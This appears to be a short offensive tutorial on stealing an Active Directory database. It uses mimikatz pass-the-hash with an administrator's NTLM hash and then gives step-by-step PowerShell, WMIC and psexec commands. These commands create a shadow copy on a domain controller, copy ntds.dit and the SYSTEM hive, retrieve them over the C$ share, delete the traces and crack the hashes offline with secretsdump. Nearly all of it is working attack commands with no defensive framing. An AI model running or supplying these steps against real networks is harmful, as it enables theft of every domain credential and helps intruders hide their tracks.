If you have the NTLM hash of a domain admin (or of a local administrator on a domain controller), you can use mimikatz to pass the hash and pull the entire Active Directory database (ntds.dit) off the DC. You also need the SYSTEM registry hive from the same machine: the boot key stored in it is required to decrypt the password hashes held in ntds.dit, so the procedure below always grabs both files.
From mimikatz (run elevated, because sekurlsa::pth needs the debug privilege), run the following command to spawn a cmd.exe whose network authentication uses the target user's hash:
sekurlsa::pth /user:<username> /domain:<domainname> /ntlm:<hash> /run:cmd.exe
Now you have a few options from the new cmd window. For example:
Using powershell
winrm set winrm/config/client '@{TrustedHosts="<computer_name>"}'
Enter-PSSession -ComputerName <computer_name>
vssadmin create shadow /for=c:
mkdir c:\1
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1
reg save hklm\system c:\1\system.hive
(HarddiskVolumeShadowCopyX is the shadow copy created by vssadmin; replace X with the number shown in the "Shadow Copy Volume Name" line of its output. reg save needs a file name, not a folder, so the hive is written to c:\1\system.hive.)
Using wmic
WMIC /node:"<computer_name>" process call create "cmd.exe /c vssadmin create shadow /for=c:"
WMIC /node:"<computer_name>" process call create "cmd.exe /c mkdir c:\1"
WMIC /node:"<computer_name>" process call create "cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1"
WMIC /node:"<computer_name>" process call create "cmd.exe /c reg save hklm\system c:\1\system.hive"
(WMIC returns as soon as the process is created, so check that the shadow copy exists and read its volume name, for example with vssadmin list shadows, before running the copy command.)
Using psexec
psexec \\<computer_name> vssadmin create shadow /for=c:
psexec \\<computer_name> cmd /c mkdir c:\1
psexec \\<computer_name> cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\windows\ntds\ntds.dit c:\1
psexec \\<computer_name> cmd /c reg save hklm\system c:\1\system.hive
Access the C$ share on the remote machine (\\<computer_name>\C$\1), retrieve ntds.dit and the saved SYSTEM hive, and delete the staging folder. Consider deleting the shadow copy as well (vssadmin delete shadows /shadow=<id>), since it is otherwise left behind on the DC. With both files in hand the hashes can be extracted offline, for example with Impacket's secretsdump.py using its -ntds and -system options.